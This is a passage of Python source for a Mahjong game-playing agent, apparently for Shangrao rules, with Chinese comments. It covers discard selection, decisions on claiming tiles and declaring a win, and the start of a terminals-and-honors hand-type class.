king_score = scoreDict[self.kingCard]\n scoreDict = sorted(scoreDict.items(), key=lambda k: k[1], reverse=True)\n maxScoreCards = []\n # 希望给飞宝更多的分数,向听数越大飞宝概率越低,希望在接近胡牌时才会选择飞宝\n # if scoreDict != [] and king_score != 0 and king_score * 1.2 >= scoreDict[0][1]: # 9.23 增加2倍\n # return self.kingCard\n # all_MG_cp = MJ.deepcopy(all_MG)\n # print self.xts(all_MG_cp,self.suits,self.kingNum-1)[0][-2],all_MG[0][-2]\n # if self.xts(all_MG_cp,self.suits,self.kingNum-1)[0][-2]==all_MG[0][-2]:\n # w = 2\n # else:\n # w = 1.5\n # w=random.uniform(1.0,2.0)\n # print w\n # if king_score * w >= scoreDict[0][1]:\n # return self.kingCard\n # if len(all_MG[0][2])==1 and len(all_MG[0][3])==1:\n # # print \"n\",sum([LEFT_NUM[MJ.convert_hex2index(i)] for i in self.get_effective_cards(all_MG[0][3])])\n # if sum([LEFT_NUM[MJ.convert_hex2index(i)] for i in self.get_effective_cards(all_MG[0][3])])>4:\n # return self.kingCard\n # elif len(all_MG[0][2])==2:\n # if sum([LEFT_NUM[MJ.convert_hex2index(i)] for i in self.get_effective_cards(all_MG[0][2])])>2:\n # return self.kingCard\n # else:\n # if king_score * 1.5 >= scoreDict[0][1]\n for i in range(len(scoreDict)):\n if scoreDict[0][1] != 0 and scoreDict[i][1] == scoreDict[0][1]:\n maxScoreCards.append(scoreDict[i][0])\n # print ('maxScoreCards2', maxScoreCards)\n if maxScoreCards != []:\n return self.discards_w(maxScoreCards, self.leftNum, ndcards={})\n else:\n pass\n # logger.warning(\"recommond card is empty!%s,%s,%s,%s,%s\", self.cards, self.suits, self.kingCard,\n # self.discards, self.discardsOp)\n\n if True:\n path_w = self.cost(all=all_MG, suits=self.suits, left_num=self.leftNum, king_num=self.kingNum,\n king_card=self.kingCard)\n path_w.sort(key=lambda k: k[0], reverse=True)\n\n if path_w[0][-1] == []: # 已经胡牌\n\n max_remove_3N = 0\n remove_card = 0\n # flag = False\n for a in all_MG:\n if a[4] == 0:\n # flag = True\n if a[1] != []:\n for t3 in a[0] + a[1]:\n lc = self.get_effective_cards(dz_set=[[t3[1], t3[2]]])\n ln = sum([self.leftNum[translate16_33(e)] for e in lc])\n\n if ln >= max_remove_3N:\n max_remove_3N = ln\n remove_card = t3[0]\n rc = self.get_effective_cards(dz_set=[[t3[0], t3[1]]])\n rn = sum([self.leftNum[translate16_33(e)] for e in rc])\n if rn > max_remove_3N:\n max_remove_3N = rn\n remove_card = t3[2]\n elif len(a[2]) != []: # 单吊\n remove_card = a[2][0][0]\n print(\"defend_V2_2,has Hu,and out a highest rate card\", 1 / remove_card, remove_card)\n return remove_card\n out_card = self.discards_w(discards=path_w[0][-1], left_num=self.leftNum, ndcards={})\n return out_card\n # for i in range(len(all_MG)):\n # for card in set(path_w[i][1]): #todo 修改点\n # if card in discards_w.keys():\n # # todo 需要加上场面剩余牌信息\n # discards_w[card] += path_w[i][0]\n # else:\n # discards_w[card] = path_w[i][0]\n # discards_w = sorted(discards_w.items(), key=lambda k: k[1], reverse=True)\n # discards=[]\n # print (\"discards_w\", discards_w)\n # for tw in discards_w:\n # if tw[1]==discards_w[0][1]:\n # discards.append(tw[0])\n #\n # return int(self.discards_w(discards=discards, left_num=self.leftNum, ndcards=ndcards))\n\n # else:\n # # 如果废牌区为空,使用搜索,出价值最低的2N\n # path_w = self.cost(all=all_MG, suits=self.suits, left_num=self.leftNum, king_num=self.kingNum,\n # king_card=self.kingCard)\n # path_w.sort(key=lambda k: k[0], reverse=True)\n # if path_w[0][-1] == []: # 已经胡牌\n #\n # max_remove_3N = 0\n # remove_card = 0\n # # flag = False\n # for a in all_MG:\n # if a[4] == 0:\n # # flag = True\n # if a[0] + a[1] != []:\n # for t3 in a[0] + a[1]:\n # lc = self.get_effective_cards(dz_set=[[t3[1], t3[2]]])\n # ln = sum([self.leftNum[translate16_33(e)] for e in lc])\n #\n # if ln >= max_remove_3N:\n # max_remove_3N = ln\n # remove_card = t3[0]\n # rc = self.get_effective_cards(dz_set=[[t3[0], t3[1]]])\n # rn = sum([self.leftNum[translate16_33(e)] for e in rc])\n # if rn >= max_remove_3N:\n # max_remove_3N = rn\n # remove_card = t3[2]\n # elif len(a[2]) == 1: # 单吊\n # remove_card = a[2][0][0]\n # print(\"defend_V2_2,has Hu,and out a highest rate card\", 1/remove_card,remove_card)\n # return remove_card\n #\n # out_card = self.discards_w(discards=path_w[0][-1], left_num=self.leftNum,ndcards=ndcards)\n # print (path_w)\n # print (\"out_card\", out_card)\n # return out_card\n\n def rf_info(self):\n \"\"\"\n 功能:给出出牌的一些信息\n 思路:分为3阶段,第一阶段完全孤张牌出牌策略,计算出所有组合中都包含的孤张牌,出评估值最低的孤张牌,剩余牌与孤张牌的联系性最低\n 第二阶段:没有孤张,采用搜索树计算出最佳出牌\n 第三阶段:胡牌后出牌\n :param all_combination: 组合信息\n :return: discard, scoreDict, discard_state 决策出牌,出牌等部分信息\n \"\"\"\n '''\n 第一阶段:完全孤张牌出牌策略\n 原则:出相关性最低的孤张牌,剩余牌与孤张牌的联系性最低\n 现阶段只考虑xts最小的情况\n '''\n all_combination = self.sys_info_V3(cards=self.cards, suits=self.suits, left_num=self.leftNum,\n kingCard=self.kingCard)\n\n all_same_xts = []\n # all_same_xts_and_left = []\n\n min_xts = all_combination[0][-2]\n for a in all_combination: # 获取xts相同的组合\n if a[-2] == min_xts:\n all_same_xts.append(a)\n # if a[-2] == min_xts and len(a[-1])==len(all_combination[0][-1]):\n # all_same_xts_and_left.append(a)\n all_MG = copy.copy(all_same_xts)\n\n # 移除搭子有效牌被覆盖��划分 ,可能出现3 56的情况,3会获得更多的机会123,234,333,345\n # for a in all_same_xts:\n # flag = False\n # for t1 in a[-1]:\n # if not flag:\n # for t2 in a[2] + a[3]:\n # th = copy.copy(t2)\n # th.append(t1)\n # th.sort()\n # if th in MJ.T2_HALF:\n # if t2 not in MJ.T2_HALF_T2 or (\n # t2 in [[2, 4], [6, 8], [0x12, 0x14], [0x16, 0x18], [0x22, 0x24],\n # [0x26, 0x28]] and t1 not in [1, 9, 0x11, 0x19, 0x21, 0x29]):\n # logger.info(\"remove duplication cs, %s,%s,%s\", a, t2, t1)\n # all_MG.remove(a)\n # flag = True\n # break\n\n # if all_MG == []:\n # all_MG = all_same_xts\n\n # 去重处理\n # 有效牌数量为0的组合应该被视为废牌 todo 宝还原\n if True: # 这一段是必须的!\n if self.kingNum <= 1: # 这里只考虑出牌、宝做宝吊的情况\n for a in all_MG:\n for i in range(len(a[3]) - 1, -1, -1):\n ab = a[3][i]\n efc = self.get_effective_cards([ab])\n if sum([LEFT_NUM[MJ.convert_hex2index(e)] for e in efc]) <= 0: # 先只算有效牌数量为0\n a[3].remove(ab)\n a[-1].extend(ab)\n # logger.info(\"remove ab with low getting rate, %s,%s,%s,a=%s\", self.cards, self.suits,\n # self.kingCard, a)\n # for a in all_MG: #todo 20201013\n # a_temp = MJ.deepcopy(a)\n # for i in range(len(a_temp[3]) - 1, -1, -1):\n # ab = a_temp[3][i]\n # efc = self.get_effective_cards([ab])\n # if sum([LEFT_NUM[MJ.convert_hex2index(e)] for e in efc]) <= 1: #先只算有效牌数量为0\n # a_temp[3].remove(ab)\n # a_temp[-1].extend(ab)\n # # logger.info(\"append ab with low getting rate, %s,%s,%s,a=%s\", self.cards, self.suits, self.kingCard, a)\n # if a_temp!=a:\n # all_MG.append(a_temp)\n all_MG = self.xts(all_MG, self.suits, self.kingNum)\n\n # print ('all_MG', all_MG)\n left_all_cards = [] # 全部组合的废牌集合\n\n for branch in all_MG:\n left_all_cards += branch[-1]\n unique_l = list(set(left_all_cards))\n left_cards = [] # 任何组合都包含的真正废牌\n left_cards_w = []\n need_jiang = False\n if all_MG[0][-2] == 1:\n if len(all_MG[0][0]) + len(all_MG[0][1]) + len(self.suits) == 4 and all_MG[0][-1] == 2:\n need_jiang = True\n\n for card in unique_l:\n if left_all_cards.count(card) == len(all_MG):\n left_cards.append(card)\n left_cards_w.append(\n self.left_card_weight(card=card, left_num=LEFT_NUM, need_jiang=need_jiang)) # 更新点:添加废牌权重\n if left_cards != []: # and all_MG[0][-2]>3:\n # if min(left_cards_w)<25: #当出37 5 的时候需要限制下\n # 这里也只能在搭子过多的情况下才会出,给的限制条件放宽点\n # if need_jiang or ((not need_jiang) and min(left_cards_w)<70):\n if True:\n # print('state first')\n return left_cards[left_cards_w.index(min(left_cards_w))], [], []\n\n '''\n 第二阶段\n 当unique_l不为空时,从所有废牌(unique_l)中出一张\n 如果为空,从所有的t2N中出一张\n '''\n # 在xts<3的情况下,使用搜索树\n # if all_MG[0][4] <= 3:\n if False:\n Tree = SearchTree(cards=self.cards, suits=self.suits, leftNum=self.leftNum, all=all_same_xts,\n remainNum=self.remainNum, dgtable=[1] * 34, kingCard=self.kingCard,\n feiKingNum=self.fei_king)\n scoreDict = Tree.getCardScore()\n king_score = 0\n if self.kingCard in scoreDict.keys():\n king_score = scoreDict[self.kingCard]\n scoreDict = sorted(scoreDict.items(), key=lambda k: k[1], reverse=True)\n maxScoreCards = []\n # print ('scoreDict',scoreDict)\n if scoreDict != [] and king_score * 1.5 >= scoreDict[0][1]:\n return self.kingCard\n\n for i in range(len(scoreDict)):\n # print (scoreDict[i][1],scoreDict[0][1])\n if scoreDict[i][1] == scoreDict[0][1]:\n maxScoreCards.append(scoreDict[i][0])\n print('maxScoreCards', maxScoreCards)\n print(scoreDict)\n # if maxScoreCards != []:\n # return self.discards_w(maxScoreCards, self.leftNum, ndcards={})\n\n # 加入处理概率过低的搭子的组合\n # todo 容易出现超时,增加向听数小于等于3的限制条件\n if False:\n # if all_MG[0][-2]<=3:\n supplement = []\n for a in all_MG:\n # print a\n a_copy = MJ.deepcopy(a)\n for ab in a[3]:\n efc = self.get_effective_cards([ab])\n # print ab,sum([LEFT_NUM[MJ.convert_hex2index(e)] for e in efc])\n if sum([LEFT_NUM[MJ.convert_hex2index(e)] for e in efc]) <= 1:\n a_copy[3].remove(ab)\n a_copy[-1].extend(ab)\n # logger.info(\"remove rate 0 ab,%s,%s,%s,a=%s\", self.cards, self.suits, self.kingCard, a)\n # break\n\n if len(a_copy[3]) != len(a[3]):\n supplement.append(a_copy)\n logger.info(\"supplement a1=%s,a2=%s\", a, a_copy)\n all_MG.extend(supplement)\n # print all_MG\n if False:\n # 加入碰碰胡处理 加到后面并不影响孤张出牌,只在搜索中使用碰碰胡\n rm_king = copy.copy(self.cards)\n for i in range(self.kingNum):\n rm_king.remove(self.kingCard)\n a_pengpenghu = self.pengpengHu(outKingCards=rm_king, suits=self.suits, kingNum=self.kingNum)\n if a_pengpenghu != [] and a_pengpenghu[0][-2] - 1 <= all_MG[0][-2]: # 现在用1\n if a_pengpenghu[0] not in all_MG: # 有可能已经存在于all_MG\n all_MG.append(a_pengpenghu[0])\n\n # 简化版搜索树\n if True:\n # if all_MG[0][-2]<=3:\n\n Tree = SearchTree_take(hand=self.cards, suits=self.suits, combination_sets=all_MG, king_card=self.kingCard,\n fei_king=self.fei_king)\n t1 = time.time()\n scoreDict, discard_state = Tree.get_discard_score()\n t2 = time.time()\n if t2 - t1 > 2.9: # 超时了\n pass\n # logger.error(\"time:%i,info:%s, %s, %s\", t2 - t1, self.cards, self.suits, self.kingCard)\n king_score = 0 # 增加飞宝得分倍率1.5\n if self.kingCard in scoreDict.keys():\n king_score = scoreDict[self.kingCard]\n scoreDict = sorted(scoreDict.items(), key=lambda k: k[1], reverse=True)\n maxScoreCards = []\n # 希望给飞宝更多的分数,向听数越大飞宝概率越低,希望在接近胡牌时才会选择飞宝\n # if scoreDict != [] and king_score != 0 and king_score * 1.2 >= scoreDict[0][1]: # 9.23 增加2倍\n # return self.kingCard\n # all_MG_cp = MJ.deepcopy(all_MG)\n # print self.xts(all_MG_cp,self.suits,self.kingNum-1)[0][-2],all_MG[0][-2]\n # if self.xts(all_MG_cp,self.suits,self.kingNum-1)[0][-2]==all_MG[0][-2]:\n # w = 2\n # else:\n # w = 1.5\n # w=random.uniform(1.0,2.0)\n # print w\n # if king_score * w >= scoreDict[0][1]:\n # return self.kingCard\n # if len(all_MG[0][2])==1 and len(all_MG[0][3])==1:\n # # print \"n\",sum([LEFT_NUM[MJ.convert_hex2index(i)] for i in self.get_effective_cards(all_MG[0][3])])\n # if sum([LEFT_NUM[MJ.convert_hex2index(i)] for i in self.get_effective_cards(all_MG[0][3])])>4:\n # return self.kingCard\n # elif len(all_MG[0][2])==2:\n # if sum([LEFT_NUM[MJ.convert_hex2index(i)] for i in self.get_effective_cards(all_MG[0][2])])>2:\n # return self.kingCard\n # else:\n # if king_score * 1.5 >= scoreDict[0][1]\n for i in range(len(scoreDict)):\n if scoreDict[0][1] != 0 and scoreDict[i][1] == scoreDict[0][1]:\n maxScoreCards.append(scoreDict[i][0])\n # print ('maxScoreCards2', maxScoreCards)\n if maxScoreCards != []:\n return self.discards_w(maxScoreCards, self.leftNum, ndcards={}), scoreDict, discard_state\n else:\n pass\n # logger.warning(\"recommond card is empty!%s,%s,%s,%s,%s\", self.cards, self.suits, self.kingCard,\n # self.discards, self.discardsOp)\n\n if True:\n path_w = self.cost(all=all_MG, suits=self.suits, left_num=self.leftNum, king_num=self.kingNum,\n king_card=self.kingCard)\n path_w.sort(key=lambda k: k[0], reverse=True)\n\n if path_w[0][-1] == []: # 已经胡牌\n\n max_remove_3N = 0\n remove_card = 0\n # flag = False\n for a in all_MG:\n if a[4] == 0:\n # flag = True\n if a[1] != []:\n for t3 in a[0] + a[1]:\n lc = self.get_effective_cards(dz_set=[[t3[1], t3[2]]])\n ln = sum([self.leftNum[translate16_33(e)] for e in lc])\n\n if ln >= max_remove_3N:\n max_remove_3N = ln\n remove_card = t3[0]\n rc = self.get_effective_cards(dz_set=[[t3[0], t3[1]]])\n rn = sum([self.leftNum[translate16_33(e)] for e in rc])\n if rn > max_remove_3N:\n max_remove_3N = rn\n remove_card = t3[2]\n elif len(a[2]) != 0: # 单吊\n remove_card = a[2][0][0]\n # print(\"defend_V2_2,has Hu,and out a highest rate card\", 1 / remove_card, remove_card)\n return remove_card, [], []\n out_card = self.discards_w(discards=path_w[0][-1], left_num=self.leftNum, ndcards={})\n return out_card, [], []\n # for i in range(len(all_MG)):\n # for card in set(path_w[i][1]): #todo 修改点\n # if card in discards_w.keys():\n # # todo 需要加上场面剩余牌信息\n # discards_w[card] += path_w[i][0]\n # else:\n # discards_w[card] = path_w[i][0]\n # discards_w = sorted(discards_w.items(), key=lambda k: k[1], reverse=True)\n # discards=[]\n # print (\"discards_w\", discards_w)\n # for tw in discards_w:\n # if tw[1]==discards_w[0][1]:\n # discards.append(tw[0])\n #\n # return int(self.discards_w(discards=discards, left_num=self.leftNum, ndcards=ndcards))\n\n # else:\n # # 如果废牌区为空,使用搜索,出价值最低的2N\n # path_w = self.cost(all=all_MG, suits=self.suits, left_num=self.leftNum, king_num=self.kingNum,\n # king_card=self.kingCard)\n # path_w.sort(key=lambda k: k[0], reverse=True)\n # if path_w[0][-1] == []: # 已经胡牌\n #\n # max_remove_3N = 0\n # remove_card = 0\n # # flag = False\n # for a in all_MG:\n # if a[4] == 0:\n # # flag = True\n # if a[0] + a[1] != []:\n # for t3 in a[0] + a[1]:\n # lc = self.get_effective_cards(dz_set=[[t3[1], t3[2]]])\n # ln = sum([self.leftNum[translate16_33(e)] for e in lc])\n #\n # if ln >= max_remove_3N:\n # max_remove_3N = ln\n # remove_card = t3[0]\n # rc = self.get_effective_cards(dz_set=[[t3[0], t3[1]]])\n # rn = sum([self.leftNum[translate16_33(e)] for e in rc])\n # if rn >= max_remove_3N:\n # max_remove_3N = rn\n # remove_card = t3[2]\n # elif len(a[2]) == 1: # 单吊\n # remove_card = a[2][0][0]\n # print(\"defend_V2_2,has Hu,and out a highest rate card\", 1/remove_card,remove_card)\n # return remove_card\n #\n # out_card = self.discards_w(discards=path_w[0][-1], left_num=self.leftNum,ndcards=ndcards)\n # print (path_w)\n # print (\"out_card\", out_card)\n # return out_card\n\n # 决策出牌\n def recommend_card(self):\n \"\"\"\n 推荐出牌接口\n :return: 返回最佳出牌\n \"\"\"\n all = self.sys_info_V3(cards=self.cards, suits=self.suits, left_num=self.leftNum, kingCard=self.kingCard)\n return self.defend_V2_2(all_combination=all)\n\n def hu_info(self, all, suits, kingNum):\n \"\"\"\n 功能:计算胡牌后的组合信息\n 思路:当胡牌后,综合计算出组合信息和副露中的kz,sz,jiang\n :param all: 组合信息\n :param suits: 副露\n :param kingNum: kingNum宝牌数量\n :return: kz ,sz ,jiang\n \"\"\"\n kz_suits = []\n sz_suits = []\n for suit in suits:\n if suit[0] == suit[1]:\n kz_suits.append(suit)\n else:\n sz_suits.append(suit)\n for a in all:\n kz = []\n kz.extend(kz_suits)\n sz = []\n sz.extend(sz_suits)\n\n jiang = 0x00\n\n if a[4] == 0:\n\n for kz_ in a[0] + a[2]:\n # if\n kz.append(kz_)\n for sz_ in a[1] + a[3]:\n if sz_[0] != 8:\n sz.append(sz_)\n else:\n sz.append(sz_ - 1)\n\n if kingNum != 0:\n jiang = [0, 0]\n else:\n jiang = a[2][0]\n return kz, sz, jiang\n return [], [], 0\n\n def recommend_op(self, op_card, canchi=False, self_turn=False, isHu=False):\n \"\"\"\n 功能:动作决策,包括吃碰杠胡的判断\n 思路:胡牌判断:当有杠时,判断杠是否为暗杠,是则直接杠,\n 否则判断杠后是否仍然胡牌,若是则杠,\n 否则接着判断,若本手胡牌基础分>8,则直接胡,否则杠,\n 当有多宝时,如果飞宝能在3手内胡牌,则先飞宝,不胡,否则胡\n 杠牌判断:有杠就杠\n 吃碰:采用了反向胡牌概率比较策略,若吃碰后的概率大于不执行动作的概率,则执行吃碰,否则pass\n :param op_card: 操作牌\n :param canchi: 能否吃牌权限\n :param self_turn: 是否是自己回合\n :param isHu: 是否已经胡牌\n :return: [],isHu 前者为吃碰杠的组合 后者为是否胡牌\n \"\"\"\n # 2项比较:前项计算胡牌rate,吃碰杠后计算胡牌rate比较,杠牌在不过多影响条件下都进行,其他需增加胡牌概率\n cards = self.cards\n suits = self.suits\n left_num = self.leftNum\n cards_former = copy.copy(cards)\n cards_former.append(0)\n all_former = self.sys_info_V3(cards=cards_former, suits=suits, left_num=left_num, kingCard=self.kingCard)\n print(\"recommend_op,all_former\", all_former)\n # 计算前向胡牌概率 完全局部最优策略\n path_w_former = self.cost(all=all_former, suits=suits, left_num=left_num, king_num=self.kingNum,\n king_card=self.kingCard)\n path_w_former.sort(key=lambda k: (k[0]), reverse=True)\n print(\"path_w_former\", path_w_former)\n rate_former = path_w_former[0][0] # 未执行动作的胡牌概率\n\n # 是否胡牌判断\n if isHu:\n logger.info(\"deal with Hu...\")\n # return [],True\n '''\n 补杠如果能杠胡则杠,\n 如果不能杠胡:本次手牌的分数较高则不杠直接胡,\n 如果本手牌分数为12分(最低分):如果杠了后胡牌几率陡降,不能胡了则不杠,\n 如果杠了胡牌几率仍然较大,则先杠\n '''\n\n # 暗杠补杠判断\n for card in cards:\n # 暗杠24 分必须要\n if cards.count(card) == 4:\n logger.info(\"choose AnGong,%s,%s,%s\", self.cards, self.suits, self.kingCard)\n return [card, card, card, card], False\n\n for card in cards:\n if [card, card, card] in suits: # 处理补杠\n cards_BuGang = copy.copy(cards)\n cards_BuGang.remove(card)\n all_BuGang = self.sys_info_V3(cards=cards_BuGang, suits=suits, left_num=left_num,\n kingCard=self.kingCard)\n asset = self.cost(all_BuGang, suits=suits, left_num=left_num,\n king_num=cards_BuGang.count(self.kingCard), king_card=self.kingCard)\n asset.sort(key=lambda k: (k[0]), reverse=True)\n buGangHuRate = asset[0][0]\n # 如果补杠后也能胡,则直接杠,否则算期望\n if buGangHuRate == 1:\n logger.info(\"choose buGang,%s,%s,%s\", self.cards, self.suits, self.kingCard)\n return [card, card, card, card], False\n else:\n return [], True\n # kz, sz, jiang = self.hu_info(all_former, self.suits, kingNum=self.kingNum)\n # if jiang == 0:\n # return [], True\n # score = Fan(kz=kz, sz=sz, jiang=jiang, fei_king=self.fei_king, using_king=0, baohuanyuan=False)\n # score = Fan(kz=kz, sz=sz, jiang=jiang, node=None, fei_king=self.fei_king)\n # 胡牌分数高,则直接胡,否则,看几率\n # if score >= 8:\n # return [], True\n # else:\n # if buGangHuRate <= rate_former * 0.5:\n # return [], True\n # else:\n # return [card, card, card, card], False\n # return [],True\n # 手中有2张宝牌,先不胡,打掉一张宝牌后3手内的胡牌概率是否超过原有期望\n if self.kingNum >= 2:\n # 如果作为宝还原,宝吊则直接胡\n # if self.kingNum == 2:\n # for a in all_former:\n # if a[4] == 0 and len(a[0]) + len(a[1]) + len(suits) == 4:\n # return [], True\n # return [], False\n\n cards_FeiBao = copy.copy(cards)\n cards_FeiBao.remove(self.kingCard)\n path_w_out1King = self.cost(all=all_former, suits=suits, left_num=left_num, king_num=self.kingNum - 1,\n king_card=self.kingCard)\n path_w_out1King.sort(key=lambda k: (k[0]), reverse=True)\n\n if path_w_out1King[0][0] * 2 < 1:\n\n return [], True\n else:\n logger.info(\"abandon hu,%s,%s,%s\", self.cards, self.suits, self.kingCard)\n return [], False\n\n # 当手牌中只剩下一个面子,宝吊的概率\n # elif (self.kingNum == 1 and len(suits) == 3):\n # rate = 0\n # for a in all_former:\n # if a[4] == 0:\n # if len(a[0]) == 1:\n # # 碰3家没有自摸\n # rate += float(self.leftNum[convert_hex2index(a[0][0][0])] * 3) / self.remainNum\n # elif len(a[1]) == 1:\n # cardSet = []\n # cardSet.extend(a[1][0])\n # if a[1][0][0] & 0x0f == 1:\n # cardSet.append(a[1][0][0] + 3)\n # elif a[1][0][0] & 0x0f == 9:\n # cardSet.append(a[1][0][0] - 1)\n # else:\n # cardSet.append(a[1][0][0] - 1)\n # cardSet.append(a[1][0][0] + 3)\n # for card in cardSet:\n # # 吃只能吃上家\n # rate += float(self.leftNum[convert_hex2index(card)]) / self.remainNum\n # if rate * 2 * 2 <= 1or self.round>=10:\n # return [], True\n # else:\n # return [], False\n\n else:\n return [], True\n\n # 杠牌限制,只杠已成型,且没有被用到的牌(在废牌区),杠牌没有分数奖励,只有多摸一张牌的机会\n # allSamexts = []\n # for a in all_former:\n # if a[4] == all_former[0][4]:\n # allSamexts.append(a)\n # 上饶麻将杠牌加分,这里直接能杠就杠\n if self_turn: # 暗杠补杠\n # 是否存在暗杠,暗杠直接杠,补杠也杠\n for card in cards:\n if cards.count(card) == 4 or [card, card, card] in suits:\n return [card, card, card,\n card], False\n # 明杠\n if cards.count(op_card) == 3:\n return [op_card, op_card, op_card, op_card], False\n # prekingcard 得分点碰牌,这里算杠牌\n\n if op_card == self.preKingCard and cards.count(op_card) == 2:\n return [op_card, op_card, op_card], False\n\n cards_add_op = copy.copy(cards)\n cards_add_op.append(op_card)\n all_later = self.sys_info_V3(cards=cards_add_op, suits=suits, left_num=left_num, kingCard=self.kingCard)\n val = [] # 记录满足条件的吃碰杠组合\n\n if canchi: # 可以吃,碰\n for a in all_later:\n t3N = a[0] + a[1]\n # 针对上饶麻将单吊处理\n if op_card not in a[-1] and (\n [op_card - 2, op_card - 1, op_card] in t3N or\n [op_card - 1, op_card, op_card + 1] in t3N or\n [op_card, op_card + 1, op_card + 2] in t3N or\n [op_card, op_card, op_card] in t3N):\n val.append(a)\n else: # 只能碰\n for a in all_later:\n if (op_card not in a[-1]) and [op_card, op_card, op_card] in a[0]:\n val.append(a)\n print(\"val\", val)\n if val != []:\n path_w_later = self.cost(all=val, suits=suits, left_num=left_num, king_num=self.kingNum,\n king_card=self.kingCard)\n # index记录有效的吃碰杠组合索引\n index = []\n for i_p in range(len(path_w_later)):\n if path_w_later[i_p][0] == 1 and self.kingNum == 0 and all_former[0][\n 4] == 1: # 已胡牌,由于上饶麻将没有点炮胡,这里考虑下有效牌数量\n efc_cards = [] # 未操作前的有效牌数量\n max_remove_3N = 0 # 操作后,打掉一张3N的左或右边的一张牌,转变成2N后的有效牌数量\n # aa+ab or aa+aa\n for a in all_former:\n if len(a[2]) == 1 and len(a[3]) == 1:\n efc_cards.extend(self.get_effective_cards(dz_set=a[3]))\n tianHu = True\n elif len(a[2]) == 2 and len(a[3]) == 0:\n efc_cards.extend(self.get_effective_cards(dz_set=a[2]))\n tianHu = True\n else:\n tianHu = False\n if tianHu:\n if a[0] + a[1] != []:\n for t3 in a[0] + a[1]:\n lc = self.get_effective_cards(dz_set=[[t3[1], t3[2]]])\n ln = sum([left_num[translate16_33(e)] for e in lc])\n # for card in lc:\n if ln > max_remove_3N:\n max_remove_3N = ln\n rc = self.get_effective_cards(dz_set=[[t3[0], t3[1]]])\n rn = sum([left_num[translate16_33(e)] for e in rc])\n if rn > max_remove_3N:\n max_remove_3N = rn\n else:\n # print a[2][0][0]\n # 找到另一对被吃碰的牌,计算期望\n t2Ns = a[2] + a[3]\n for t2 in a[2] + a[3]:\n if op_card in self.get_effective_cards([t2]):\n t2Ns.remove(t2)\n break\n # 单吊了\n if self.leftNum[translate16_33(t2Ns[0][0])] * 2 > max_remove_3N:\n max_remove_3N = self.leftNum[translate16_33(t2Ns[0][0])]\n\n efc_num = 0 # 胡牌的有效牌数量\n efc_cards = set(efc_cards)\n for card in efc_cards:\n efc_num += left_num[translate16_33(card)]\n print(\"efc_num,max_remove_3N\", efc_num, max_remove_3N)\n if max_remove_3N < efc_num * 1.2: # or not (max_remove_3N==efc_num and len(cards)<=7): # 如果有效牌数量增加,则执行此操作\n return [], False # continue\n\n # 有宝可以打宝吊,单吊\n print(path_w_later[i_p][0], rate_former)\n if path_w_later[i_p][0] >= 1:\n path_w_later[i_p][0] = 1\n if path_w_later[i_p][0] > rate_former: # or (self.kingNum != 0 and len(cards) <= 4): #单吊\n index.append([i_p, path_w_later[i_p][0]])\n index.sort(key=lambda k: k[1], reverse=True)\n if index != []:\n for t3 in val[index[0][0]][0] + val[index[0][0]][1]: # 在最优吃碰杠组合中给出该3N,修正点,从all_later修正为val\n print(\"op_ t3\", t3)\n if op_card in t3:\n if canchi:\n return t3, False\n elif t3[0] == t3[1]:\n return t3, False\n return [], False\n\n\n# 九幺牌型类\nclass jiuyao():\n def __init__(self):\n \"\"\"\n 类变量初始化\n 存储幺九牌\n \"\"\"\n self.yaojiu_cards = [0x01, 0x09, 0x11, 0x19, 0x21, 0x29, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37]\n pass\n\n def get_yaojiu_num(self, cards=[], suits=[]):\n \"\"\"\n 计算手牌中幺九牌的数量\n 副露中若存在非幺九牌,则直接返回[-1]*34\n :param cards: 手牌\n :param suits: 副露\n :return: yaojiu_num, yaojiu_num_hand 手牌与副露中的幺九牌总数列表 手牌中的幺九牌数量\n \"\"\"\n yaojiu_num = [0] * (2 * 3 + 7) # 按位存储幺九牌的个数\n yaojiu_num_hand = [0] * (2 * 3 + 7)\n for i in suits:\n if i[0] not in self.yaojiu_cards or i[1] != i[0]:\n return [-1] * (2 * 3 + 7), yaojiu_num_hand\n else:\n yaojiu_num[self.yaojiu_cards.index(i[0])] += 3\n for i in range(13):\n yaojiu_num_hand[i] = cards.count(self.yaojiu_cards[i])\n yaojiu_num[i] += cards.count(self.yaojiu_cards[i])\n\n return yaojiu_num, yaojiu_num_hand\n\n def jiuyao_info(self, cards=[], suits=[], left_num=[]):\n \"\"\"\n 综合计算幺九牌型类相关信息\n :param cards: 手牌\n :param suits: 副露\n :param left_num: 剩余牌\n :return: {} 字典格式存储的幺九牌信息\n \"\"\"\n jiuyao_info = {}\n left_cards = []\n\n yaojiu_num, yaojiu_num_hand = self.get_yaojiu_num(cards=cards, suits=suits)\n jiuyao_info[\"yaojiu_num\"] = yaojiu_num\n jiuyao_info[\"yaojiu_num_hand\"] = yaojiu_num_hand\n # 副露中有非幺九牌,无法胡九幺\n if yaojiu_num[0] == -1:\n jiuyao_info[\"xts\"] = 14\n return jiuyao_info\n\n cards_copy = copy.copy(cards)\n for i in range(len(yaojiu_num_hand)):\n for j in range(yaojiu_num_hand[i]):\n cards_copy.remove(self.yaojiu_cards[i])\n # discards 算剩余幺九牌的数目\n\n jiuyao_info[\"left_cards\"] = cards_copy\n jiuyao_info[\"xts\"] = 14 - sum(yaojiu_num)\n return jiuyao_info\n\n @staticmethod\n def defend_V1(left_cards=[], king_card=None):\n \"\"\"\n 幺九牌出牌决策\n 按出牌次序discards_order,直接出非幺九牌\n :param left_cards: 剩余牌\n :param king_card: 宝牌\n :return:\n \"\"\"\n discards_order = [0x02, 0x08, 0x12, 0x18, 0x22, 0x28, 0x03, 0x07, 0x13, 0x17, 0x23, 0x27, 0x04, 0x06, 0x14,\n 0x16, 0x24, 0x26, 0x05, 0x15, 0x25]\n\n # print(\"jiuyao,defend_V1,left_cards=\",left_cards)\n for card in discards_order:\n if card in left_cards:\n # 宝牌处理:有宝的情况,宝牌后出\n if card == king_card:\n continue\n return card\n\n if king_card in left_cards:\n return king_card\n\n return None\n\n #\n\n def one_of(self, array1, array2):\n \"\"\"\n 判断一个数组是否存在于另一个数组中\n :param array1: 数组1\n :param array2: 数组2\n :return:\n \"\"\"\n for e in array2:\n if (array1 == e).all():\n return True\n return False\n\n def recommend_op(self, op_card, cards=[], suits=[], left_num=[], king_card=None, canchi=False, self_turn=False):\n \"\"\"\n 幺九牌型的动作决策\n 有幺九牌的碰杠直接碰杠,非幺九不碰杠\n :param op_card: 操作牌\n :param cards: 手牌\n :param suits: 副露\n :param left_num: 剩余牌\n :param king_card: 宝牌\n :param canchi: 吃牌权限\n :param self_turn: 是否是自己回合\n :return: [] 动作组合牌\n \"\"\"\n jiuyao_info = self.jiuyao_info(cards=cards, suits=suits, 